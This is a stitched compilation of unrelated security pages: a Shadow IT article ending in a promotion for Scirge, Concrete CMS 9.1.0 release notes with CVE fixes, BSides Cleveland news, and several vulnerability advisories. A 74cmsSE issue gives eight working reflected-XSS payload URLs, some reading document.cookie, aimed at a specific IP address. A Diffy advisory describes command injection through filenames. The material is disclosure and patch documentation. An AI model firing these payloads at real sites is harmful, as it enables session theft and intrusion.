Just before last Christmas, in a first-of-a-kind case, JPMorgan was fined $200M for employees using non-sanctioned applications for communicating about financial strategy. No mention of insider trading, naked shorting, or any malevolence. Just employees circumventing regulation using, well, Shadow IT. Not because they tried to obfuscate or hide anything, simply because it was a convenient tool

Just before last Christmas, in a first-of-a-kind case, JPMorgan was fined $200M for employees using non-sanctioned applications for communicating about financial strategy. No mention of insider trading, naked shorting, or any malevolence. Just employees circumventing regulation using, well, Shadow IT. Not because they tried to obfuscate or hide anything, simply because it was a convenient tool that they preferred over any other sanctioned products (which JPMorgan certainly has quite a few of.)

Visibility into unknown and unsanctioned applications has been required by regulators and also recommended by the Center for Internet Security community for a long time. Yet it seems like new and better approaches are still in demand. Gartner has identified External Attack Surface Management, Digital Supply Chain Risk, and Identity Threat Detection as the top three trends to focus on in 2022, all of which are closely intertwined with Shadow IT.

"Shadow IDs," or in other words, unmanaged employee identities and accounts in third-party services are often created using a simple email-and-password-based registration. CASBs and corporate SSO solutions are limited to a few sanctioned applications and are not widely adopted on most websites and services either. This means, that a large part of an organization's external surface –as well as its user identities– may be completely invisible.

Above all, these Shadow IDs remain unmanaged even after employees leave the organization. This may result in unauthorized access to sensitive customer data or other cloud-based services. Employee-created, but business-related identities are unseen for most IDM/IAM tools also. The graveyard of forgotten accounts belonging to ex-employees or abandoned applications is growing every day, to infinity.

And sometimes, the dead rise from their graves, as with the Joint Commission On Public Ethics, whose legacy system was breached this year, even though it's been out of use since 2015. They rightfully notified their legacy users because they understand that password reuse may stretch over several years, and according to Verizon, stolen credentials are still the top contributor to all sorts of breaches and attacks. So when Shadow IDs are left behind, they create an everlasting risk unseen and unmanaged by anyone.

****How to Report on Shadow IT and Shadow IDs?****

Unfortunately, network monitoring misses the mark, as those tools are designed to filter malicious traffic, provide data leakage protection and create category-based rules for browsing. However, they are completely blind to actual logins, and thus cannot differentiate browsing, private accounts, and corporate application signups, (or phishing sites for that matter). To discover and manage Shadow IDs and Shadow IT, there needs to be application and account-level monitoring in place, that can create a trusted, global source of truth across the organization.

Discovering these assets via monitoring business-related credential usage on any website enables a unified view of unsanctioned or unwanted applications. Inventories of apps and accounts provide visibility of the true scope of external services and identities used across the organization. Also, they allow the reviewing of third-party providers about their policies, security and authentication measures, and how they are managing and maintaining your data.

It is impossible to properly categorize all of the quarter-million new domains that are registered each day across the globe, so monitoring those that show up on our endpoints is the right approach. As a side-effect, revealing logins on suspicious or new apps will **give visibility into successful phishing attacks** that were not prevented on a gateway or client-side, and where employees gave away important credentials.

**Scirge is a browser-based tool** that provides complete visibility into Shadow IDs and Shadow IT, password hygiene for corporate and third-party business web accounts, and even real-time employee education and awareness. And it also has **a completely free version** for auditing your cloud footprint, so you can get an immediate view of the extent of Shadow IT amongst your employees.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

What Are Shadow IDs, and How Are They Crucial in 2022?

IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 could allow a low level user to obtain sensitive information from the details of the 'Cloud Storage' page for which they should not have access. IBM X-Force ID: 202682.

CVE-2021-29768: Security Bulletin: IBM Cognos Analytics has addressed multiple vulnerabilities

XSS in /dashboard/blocks/stacks/view_details/ - old browsers only. When using an older browser with built-in XSS protection disabled, insufficient sanitation where built urls are outputted can be exploited for Concrete 8.5.7 and below as well as Concrete 9.0 through 9.0.2 to allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Concrete CMS Security team ranked this vulnerability 3.1with CVSS v3.1 Vector AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N. Sanitation has been added where built urls are output. Credit to Credit to Bogdan Tiron from FORTBRIDGE (https://www.fortbridge.co.uk/ ) for reporting

**New Features**

*   Improved appearance and functionality when editing block, area, layout and container styles inline in the page (thanks deek87)
*   Added the ability for an Express attribute to be marked as unique, provided its attribute type supports it. Unique attributes will be useful for SKUs, enforcing email uniqueness, etc…
*   Much improved version comparison feature that can compare the HTML of two page versions and highlight differences (thanks deek87 and hissy)
*   Feature Link block improvements: Adds option for 'link' styled button using BS5 .btn-link button class, Adds the option to include an icon in the button and to have icon only buttons. Moves some construction of the button to the view file to allow easy comprehension/modification/extension in Block Templates by novice developers (thanks Katalysis)
*   Hero Image block improvements: Adds option for 'link' styled button using BS5 .btn-link button class, Adds the option to include an icon in the button and to have icon only buttons. Moves some construction of the button to the view file to allow easy comprehension/modification/extension in Block Templates by novice developers (thanks Katalysis)
*   Added new Security Policy page in the Dashboard (thanks hissy)
*   Added a “Revert to Draft” command button on published pages in the Composer interface (thanks hissy)
*   Improvements and refinements to Dashboard file details screen in desktop and mobile views.
*   Added the ability to move a file folder in the Dashboard file manager.
*   Added the tree view back to the Groups Dashboard page.
*   Add title field for YouTube and Video block types for better accessibility (thanks Mesuva)

**Behavioral Improvements**

*   Express attributes no longer need to be unique across all Express objects. Instead attribute handles can be reused provided they’re not reused within the same object.
*   New Express forms will be created when Express Form blocks that have been copied are edited in their new locations (thanks Xanweb)
*   File chooser has improved view and functionality; bug fixes; adding width, height and size to list and grid view; adding detail image callout on hover.
*   Task Options in the Dashboard have have been moved into a modal dialog when present, so they’re harder to miss (thanks deek87)
*   Express entity attribute handles now can be reused as long as they’re not reused within the same Express object.
*   You can now click on the entire row of a Dashboard results table (like the page search, file manager, etc…) and go to the detail URL.
*   Better display of inline floating commands for things like containers and block move.
*   We now show the container name when hovering over containers in edit mode.
*   Reinstated CSS and JavaScript asset post-processing cache setting; restructured the Dashboard Cache Settings page for better grouping of functionality and explanation.
*   Improve display of Recaptcha settings page.
*   Appearance improvements to Waiting for Me and the Dashboard desktop.
*   Active classes for pages added to the output of the Top Navigation Bar block (thanks danklassen)
*   Locale home page is now undeleteable when using multilingual sites.
*   Miscellaneous performance improvements for logged-in users (thanks hissy)
*   Added rate limiting to Forgot Password using the built-in IP Allowlist/Denylist functionality
*   Better usage of meta canonical tag in page under certain circumstances (thanks hissy)
*   File folders now cannot be deleted if they have sub-folders or sub-files in them.
*   Display improvements to inline style dropdown (no more too-dark panels with no contrast.)
*   Better automatic display of the “Approve Stack” button when editing block parameters, styles and permissions in the stacks Dashboard page.
*   Don’t allow users to delete site types until they have removed all sites of that type.
*   Improvements when Concrete is installed in a subdirectory instead of the root directory of a website.
*   Added the ability to view a user’s public profile from their Dashboard user details page.
*   Added --session-handler to the console install utility. Set to database if you’d like to override the default file-based sessions.
*   Gotten rid of the behavior where certain dynamic trees cause pages to scroll to them on load (visible on Express Object details edit, adding groups, using the Groups selector in custom Dashboard pages, and more)
*   JavaScript and CSS assets now have the timestamp of when the cache was last cleared appended to them (thanks deek87, haeflimi)
*   Added the link back to the “Data Objects” Express management interface from the header of that Express objects results page.
*   Added URL Path as a column that can be added to the Page Search interface.
*   Fixed: Login page forces gray background on custom themes
*   Fixed: Scheduled page publishing doesn't purge the page cache (thanks hissy)
*   Added more caching to certain objects to improve performance (thanks hissy)
*   Pre-selected File Storage Location For Nested Folder

**Bug Fixes**

*   Much improved PHP 8 compatibility fixes for all core block types (thanks deek87)
*   Fixed user permissions for searching users with non super admin not working in sites upgraded from 8.5 until permissions were reset.
*   Fixed inability to assign groups, users, group sets or group combinations to group permissions when updating from 8.5.
*   Improvements to core libraries to allow for installation on PHP 8.1 w/Composer.
*   PHP 8 compatibility fixes for Calendar (thanks deek87)
*   Fixed: Database Character Set is no longer showing current character set.
*   Fixed: Missing font selection for body font in Atomik customizer when using Default skin.
*   Fixed: Batch Task with empty batch does not finish running
*   Fix Top Navigation Bar block 'include sticky nav' setting not set appropriately when editing the block
*   Fixed inability to drag an individual block out of the stacks panel in a page.
*   Fixed: Document Library advanced search fields do not display
*   Fixed “Express form error dirty entity” error that users might see when creating forms on the front-end.
*   Fixed bug where attribute data validation routines weren’t being run when updating certain objects and certain objects in bulk.
*   Fixed: Express Calendar and Calendar Event Attributes Not Correctly Implemented
*   Fixed: "Added to Page" File search filter doesn't work
*   Fixed: Schedule Guest Access doesn't work (thanks HamedDarragi)
*   Fixed: Page Search in chooser dialog doesn’t work (thanks HamedDarragi)
*   Fixed: The multilingual panel/page relations panel didn’t allow you to create pages in the multilingual trees from the related page - and it used to.
*   Fixed strange appearance in Dashboard sitemap selector when using multisite and multiple locales.
*   Fixed bugs with using custom file attributes with the Document Library block.
*   Fixed theme customizer not working on legacy LESS-based themes when being used with a large number of LESS variables.
*   Fixed inability to see sort icons on attributes in the Dashboard.
*   Fix Auto-Nav showing duplicate tabs in themes based on Bootstrap 3 (thanks lvanstrijland)
*   Fixed: When using more than one user search criteria by group, one to include groups and one to exclude groups, we get the wrong results (thanks mnakalay)
*   Fixed: Accordion block doesn't load required assets when not using BS5 based theme.
*   Fixed Error when try to edit 'express details block' (thanks Ruud-Zuiderlicht)
*   Fixed edit page type basic details error on PHP 8.
*   Tooltips now work properly again in Composer interface (thanks danklassen)
*   Fixed inability to create and update skins for themes that had a large number of parameters under certain conditions.
*   Fixed errors that would occur when creating a site, enabling multilingual, setting a new source locale, and deleting the original default locale.
*   Fixed: User activation workflow, Activate action not working
*   Fixed: 9.0.2 Seo Bulk Updater for multilingual site not showing results when selecting All Levels (thanks danklassen)
*   Fixed: Placing a Sticky "Top Navigation Bar" in Global "Navigation" using Atomik blocks editing of page
*   Fixed: Topics Attribute Search Form is not getting translated on Frontend (thanks 1stthomas)
*   Re-enabled the ability to edit a user’s avatar from their Dashboard details page.
*   Fixed: Clipboard - Unable to remove broken clipboard entries/clipboard doesnt remove deleted blocks
*   Fixed: When placing a stack, the edit mode menu is not displayed
*   Fixed: Adding Options To Option List Page Attribute Undefined Array Key under PHP 8
*   Fixed: Multilingual copy site tree with alias pages (thanks hissy)
*   Fixed: v9 Elemental Block Edit Nav Tabs Broken (thanks ccmEnlil)
*   Fixed: Error in updating package from marketplace incorrectly displaying itself under certain conditions (thanks JohnTheFish)
*   Fixed: Accordion block editing interface rich text editor doesn’t have access to Concrete-specific features like file manager, sitemap, etc…
*   Fixes ErrorException - Undefined property: Concrete\\Core\\Permission\\Access\\Entity\\GroupCombinationEntity::$label under PHP 8 (thanks 1stthomas)
*   Legacy form's "reply to this email address" checked state was not properly passed (thanks katzueno)
*   Fixed errors with the legacy form (thanks mlocati)
*   Fixed: Updating an express form handle can result in a table name that is too long for mysql
*   Fix several user search fields not retaining their selected values (thanks mnakalay)
*   Fixed: install with Elemental full fails due to undefined array key "titleFormat" under PHP 8
*   Fix YouTube block responsive size class issue (thanks katalysis)
*   Fixed Marketplace dashboard page broken under PHP 8
*   Conversation rating stars now appear properly (thanks deek87)
*   Fixed inability to remove an entry from the trash when that entry is an alias to an external link (thanks Ruud-Zuiderlicht)
*   Fixed bug where core “Parallax Image” area custom template (deprecated) now works again
*   Fix a bug with having multiple image blocks with on-hover attribute set on the page didn’t work reliably (thanks evgk)
*   Fixed: Toolbar title styling interfering with intelligent search results in accessibility mode (thanks Mesuva)
*   Fixed: Switch Language block default view does not work
*   Fixed inability to use the “Express Entry Selector Multiple” form control type.
*   \[V9 RC\]Fixed cookie not being cleared properly to open "add block panel" when using the sticky add panel and installing Concrete in a sub-directory
*   Fixed: Position of the reCAPTCHA badge not shown correctly after saving
*   Fixed errors in waiting for me when groups or users were deleted.
*   Fix inability to set storage location from file details Dashboard page.
*   Fixed bugs with thumbnails on alternate storage locations (thanks mnakalay)
*   Fixed: concrete.debug.hide\_keys' not working on Globals do to commented Code
*   Fix IpAccessControlService check against specific access control category (thanks mlocati)
*   Access Control: fix sorting categories in the dashboard page (thanks mlocati)
*   Fixed bug: When there's no time window, we currently ban IP addresses forever, even if we configure Concrete to only ban for X seconds. (thanks mlocati)
*   Fixed bug: "Illegal mix of collations" when running reindex task when running under certain database conditions.
*   Added “snippet.png” back into rich text editor so you can see that button.
*   Fixed: Removing Author User From Page Attributes & Saving Throws Error
*   Fixed: Deleting Containers throws Access Denied error under certain in-page editing conditions.
*   Fixed: Rich Text Page Attribute Composer "Source" Editing Hindered By Composer Autosave
*   Fixed a bug in image processing (Imagine Library) that could lead to segmentation faults under certain conditions (thanks mlocati)
*   Fixed: PlaceholderService error in thumbnail overview (thanks haeflimi)
*   Fixed: Deleting Containers shows multiple delete modal windows under certain in-page editing conditions.
*   Fixed: Top navigation block always loads the default site tree even in multilingual sites (thanks danklassen)
*   Fixed inability to override session handler to database in config prior to installation and then install successfully.
*   Fix missing none option in attribute display block (thanks JohnTheFish)
*   Fixed: Stacks with no approved versions do not appear in stacks list

**Backward Compatibility Notes**

*   The Concrete\Core\Express\Form\Validator\Routine\RoutineInterface class and all classes that implement it has changed. The validate method now takes a nullable third parameter for the Concrete\Core\Entity\Express\Entry object that may or may not exist. This replaces the request type attribute. The request type can now be inferred - if the entry does not exist, we assume this to be an ADD operation. If the entry exists within the validate method, you are running an UPDATE operation.
*   Block::duplicate() has changed its secondary parameter from $isCopiedWhenPropagated to $controllerMethodToTryAndRun. This lets us choose duplicate_master or the new duplicate_clipboard in certain situations. It is very unlikely that this should impact any custom code you have written as this is pretty deep in the Concrete internals.
*   If you have customized the Document Library view template, please ensure that your <form> tag has a valid input button with the name ”search”. This is checked in the controller in order to ensure searching is actually occurring. If you want to search by advanced file attributes, you’ll need this to be in place or else the Document Library controller will not check for attribute searching.

**Developer Updates**

*   Added on_page_version_delete event (thanks hathawayweb)
*   Mail Importer code running on ancient Zend Mail code updated to PHP 7+ (thanks KevinBLT)
*   Patches to third party libraries to allow for installation on PHP 8.1 w/Composer (thanks mlocati)
*   htmlawed HTML sanitization library updated for better compatibility with HTML5.
*   IP Access Control: add IpAccessControlCategory::describeTimeWindow() (thanks mlocati)
*   Allow Date service class to work with DateTimeImmutable objects (thanks mlocati)
*   Improvements and bug fixes to route building and controller syntax (thanks mlocati)
*   More reliable running of on\_start() in block controllers before page contents are rendered (thanks hissy)
*   Moved concrete5/dependency-patches to the core composer.json instead of the separate composer project (thanks mlocati)
*   Improved code commenting throughout all core blocks (thanks deek87)
*   Fix list\_syntax rule of PHP-CS-Fixer (thanks mlocati)
*   Significant list of third party PHP script minor updates.
*   Simplify c5:exec return code (thanks mlocati)
*   Fixed: Task scheduling command is incorrect on dashboard page and in documentation, needs more detail
*   Concrete\Core\Http\ResponseFactory used to take $session as its first constructor dependency, even though that was not used. This caused problems in the event response factory was used prior to sessions being available or being configured for database sessions that were not yet installed. This parameter has been removed. If you use the $app->make() method of building this class, you should not be affected.
*   Now using https:// for communication with the Concrete marketplace even when the user’s site is not https://

**Security Fixes**

*   Fixed several places where we weren’t sanitizing file names in the file manager and stacks page.
*   Remediated CVE-2022-21829 - Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below can download zip files over HTTP and execute code from those zip files which could lead to an RCE. Fixed by enforcing ‘concrete\_secure’ instead of ‘concrete’. Concrete now only makes requests over https even if a request comes in via http. Concrete CMS security team ranked this 8 with CVSS v3.1 vector: AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H Credit goes to Anna for reporting on HackerOne - https://hackerone.com/reports/1482520
*   Remediated CVE-2022-30117 - Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below allowed traversal in /index.php/ccm/system/file/upload which could result in an Arbitrary File Delete exploit. This was remediated by sanitizing /index.php/ccm/system/file/upload to ensure Concrete doesn’t allow traversal and by changing isFullChunkFilePresent to have an early false return when input doesn't match expectations.Concrete CMS Security team ranked this 5.8 with CVSS v3.1 vector AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H. Credit to Siebene for reporting https://hackerone.com/reports/1482280
*   Remediated CVE-2022-30120 - XSS in /dashboard/blocks/stacks/view\_details/ - old browsers only. When using an older browser with built-in XSS protection disabled, insufficient sanitation where built urls are output can be exploited for Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below to allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Dashboard Stacks page sort URLs are now sanitized. Concrete CMS Security team ranked this vulnerability 3.1 with CVSS v3.1 Vector AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N. Sanitation has been added where built urls are output. Credit to Bogdan Tiron from FORTBRIDGE (https://www.fortbridge.co.uk/ ) for reporting https://hackerone.com/reports/1363598
*   Remediated CVE-2022-30119 - XSS in /dashboard/reports/logs/view - old browsers only. When using Internet Explorer with the XSS protection disabled, insufficient sanitation where built urls are output can be exploited for Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below to allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Concrete CMS Security team ranked this vulnerability 2 with CVSS v3.1 Vector AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N. Sanitation has been added where built urls are output. Thanks zeroinside for reporting https://hackerone.com/reports/1370054
*   Remediated CVE-2022-30118 - XSS in /dashboard/system/express/entities/forms/save\_control/\[GUID\]: \\ old browsers only. When using Internet Explorer with the XSS protection disabled, editing a form control in an express entities form for Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below can allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Concrete CMS Security team ranked this vulnerability 2 with CVSS v3.1 Vector AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N. Thanks zeroinside for reporting https://hackerone.com/reports/1370054

CVE-2022-30120: 9.1.0 Release Notes :: Concrete CMS

Fury among online community over decision to include presenter

Fury among online community over decision to include presenter

The organizer of BSides Cleveland has stepped down after an online backlash that followed a controversial figure being invited to speak as a “surprise”.

The annual infosec conference, held last weekend (June 17-18), saw a handful of speakers walk out in protest over the appearance of social engineering expert Chris Hadnagy.

Hadnagy is a controversial figure in the hacking community and has previously been banned from DEF CON, the iconic hacking conference, due to allegations he violated the event’s code of conduct.

He had been added to the bill to speak as a ‘special guest’ on day two of the conference. However, when other community members found out he was appearing, the backlash prompted some speakers to abandon their presentations.

Read more of the latest news from the infosec community

John Strand, known online as ‘strandjs’, was due to present a talk but announced on Twitter that he would instead be leaving the event, writing online that the situation “sucks”.

Dave Kennedy, who was also scheduled to speak, echoed Strand’s thoughts, concluding it was “the right decision to pull it”. 

Rockie Brockway, BSides Cleveland organizer, has since released a statement taking responsibility for the incident and announcing that he is stepping down from the role.

Brockway posted online (non-HTTPS link): “The decision to include Chris Hadnagy in the 2022 BSidesCleveland event was my decision. Furthermore, the decision to keep the opening speaker slot as Special Guest instead of naming Chris specifically was also my decision.

“I am apologizing to everyone that my decisions harmed, whether strangers, family, sponsors, or friends, and I am deeply sorry for that. I understand that my decisions may have destroyed the trust that I have built over my years in the BSides community, and I accept accountability for my actions.

“Effective immediately I resign from BSidesCLE leadership.”

**New direction**

The founders of Security BSides, which does not organize local chapter events such as BSides Cleveland, have since issued a call for volunteers to step forward as new organizers.

It read: “Is it possible to host controversial speakers at a BSides conference? Absolutely, but there’s a right way to go about it.

“Organizers should discuss among themselves. They should seek input from their community. The details of the controversy should be considered, including both the benefits and drawbacks of allowing a controversial figure to speak.

“All volunteers, sponsors, and attendees should be notified and given ample time to decide whether to participate.”

**Statement**

Chris Hadnagy told The Daily Swig in response: “I do want to apologize to anyone who was confused or upset by the lack of advance notice about my appearance. This was simply an oversight and not done deliberately.

“The organizers of BSides Cleveland do not deserve the level of criticism they have received, a lot of which appears to be from people who weren’t even at the conference. I hope people will understand that the BSides organizers are good, hardworking people who volunteered their time to put on a great conference that tried to cover many important issues in our field. They had no ill-intent. Neither did I.

“I really do hope that we can reach a point in our industry – and society at large – where we can have open and honest conversations again, and a willingness to hear from both sides of an issue, before immediately deciding the worst about someone and reverting to online attacks and shaming.

“I have faced criticism for the last few months over a murky decision made by DEF CON that has never been properly explained by them. This has caused me, my family, my colleagues, and my friends a great deal of harm.

“I am not guilty of any crimes, but I am being treated like a criminal by some in the infosec community. I am very sorry for any trouble that my appearance this weekend caused to BSides, the other speakers, the attendees, and the sponsors.”

YOU MAY ALSO LIKE Security researcher receives legal threat over patched Powertek data center vulnerabilities

BSides Cleveland organizer steps down after controversial guest added as ‘surprise’ speaker

The function that calls the diff tool in versions of Diffy prior to 3.4.1 does not properly handle double quotes in a filename when run in a Windows environment. This allows attackers to execute arbitrary commands via a crafted string.

**Improper handling of double quotes in file name in Diffy in Windows environment**

High severity GitHub Reviewed Published Jun 24, 2022 • Updated Jun 25, 2022

GHSA-5ww9-9qp2-x524: Improper handling of double quotes in file name in Diffy in Windows environment

The Bosch Ethernet switch PRA-ES8P2S with software version 1.01.05 runs its web server with root privilege. In combination with CVE-2022-23534 this could give an attacker root access to the switch.

CVE-2022-32535: Multiple Vulnerabilities PRA-ES8P2S Ethernet-Switch

74cmsSE v3.5.1 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /index/jobfairol/show/.

**Vulnerability name**：Reflective XSS  
**Date of Discovery**: 30/5/2022  
**Affected version**: 74cmsSE\_v3.5.1  
**Download link**: http://www.74cms.com/downloadse/show/id/68.html  
Vulnerability Description:  
The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim.

Vulnerability location：Many places，Here are some places I found:  
Verification process：  
1、exp: http://124.223.95.129:8766/index/jobfairol/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>

With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS

2、exp：http://124.223.95.129:8766/job/?"<ScRiPt>alert("xss");<%2FScRiPt>"=11  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

3、exp：http://124.223.95.129:8766/company/?"<ScRiPt>alert(1)<%2FScRiPt>"=11  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

4、exp：http://124.223.95.129:8766/company/view\_be\_browsed/total/d1/\_d1\_/?"<ScRiPt>alert(11)<%2FScRiPt>"=2  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

5、exp：http://124.223.95.129:8766/company/service/increment/add/im/d1/\_d1\_/d2/\_d2\_.html?"<ScRiPt>alert(123)<%2FScRiPt>"=world  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

6、exp: http://124.223.95.129:8766/company/account/safety/trade/?"<ScRiPt>alert(555)<%2FScRiPt>"=key  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

7、exp: http://124.223.95.129:8766/index/notice/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

8、exp: http://124.223.95.129:8766/company/down\_resume/total/nature/?"<ScRiPt>alert(11)<%2FScRiPt>"=page

  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

Repair method：  
Filter the data according to the tags and attributes of the whitelist to clear the executable script (such as script tag, oneror attribute of img tag, etc.)

CVE-2022-32124: There are multiple reflective XSS vulnerabilities in this cms · Issue #3 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading

The function that calls the diff tool in Diffy 3.4.1 does not properly handle double quotes in a filename when run in a windows environment. This allows attackers to execute arbitrary commands via a crafted string.

@@ -49,13 +49,7 @@ def diff \[string1, string2\] end  
if WINDOWS \# don't use open3 on windows cmd \= sprintf '"%s" %s %s', diff\_bin, diff\_options.join(' '), @paths.map { |s| %("#{s}") }.join(' ') diff \= \`#{cmd}\` else diff \= Open3.popen3(diff\_bin, \*(diff\_options + @paths)) { |i, o, e| o.read } end diff, stderr, process\_status \= Open3.capture3(diff\_bin, \*(diff\_options + @paths)) diff.force\_encoding('ASCII-8BIT') if diff.respond\_to?(:valid\_encoding?) && !diff.valid\_encoding? if diff =~ /\\A\\s\*\\Z/ && !options\[:allow\_empty\_diff\] diff \= case options\[:source\]

CVE-2022-33127: Remove windows specific exec.  Open2.capture3 should work on all · samg/diffy@478f392

totd before 1.5.3 does not properly randomize mesg IDs.

Authors: 

Philipp Jeitner, _Fraunhofer Institute for Secure Information Technology SIT, National Research Center for Applied Cybersecurity ATHENE;_ Haya Shulman, _Fraunhofer Institute for Secure Information Technology SIT, National Research Center for Applied Cybersecurity ATHENE, and Goethe-Universität Frankfurt;_ Lucas Teichmann, _Fraunhofer Institute for Secure Information Technology SIT;_ Michael Waidner, _Fraunhofer Institute for Secure Information Technology SIT, National Research Center for Applied Cybersecurity ATHENE, and Technische Universität Darmstadt_

BibTeX

@inproceedings {281372,  
title = {{XDRI} Attacks - and - How to Enhance Resilience of Residential Routers},  
booktitle = {31st USENIX Security Symposium (USENIX Security 22)},  
year = {2022},  
address = {Boston, MA},  
url = {https://www.usenix.org/conference/usenixsecurity22/presentation/jeitner},  
publisher = {USENIX Association},  
month = aug,  
}

CVE-2022-34295: XDRI Attacks - and - How to Enhance Resilience of Residential Routers

Buffer Over-read in GitHub repository vim/vim prior to 8.2.

@@ -1206,6 +1206,7 @@ cmdline\_insert\_reg(int \*gotesc UNUSED)

{

int i;

int c;

int save\_new\_cmdpos = new\_cmdpos;

**This comment has been minimized.**

Sign in to view

Copy link

****djklimes** Jun 22, 2022**

When I build this change with:  
./configure --with-features=tiny --enable-perlinterp=no --enable-pythoninterp=no --enable-python3interp=no --enable-rubyinterp=no --enable-luainterp=no --with-vim-name=vim-minimal --enable-gui=no  
make  
it fails with:  
ex\_getln.c:1209:35: error: ‘new\_cmdpos’ undeclared (first use in this function); did you mean ‘set\_cmdspos’?  
1209 | int save\_new\_cmdpos = new\_cmdpos;

  

#ifdef USE\_ON\_FLY\_SCROLL

dont\_scroll = TRUE; // disallow scrolling here

@@ -1224,8 +1225,6 @@ cmdline\_insert\_reg(int \*gotesc UNUSED)

#ifdef FEAT\_EVAL

/\*

\* Insert the result of an expression.

\* Need to save the current command line, to be able to enter

\* a new one...

\*/

new\_cmdpos = -1;

if (c == '\=')

@@ -1266,6 +1265,8 @@ cmdline\_insert\_reg(int \*gotesc UNUSED)

}

#endif

}

new\_cmdpos = save\_new\_cmdpos;

  

// remove the double quote

redrawcmd();

Tag

#perl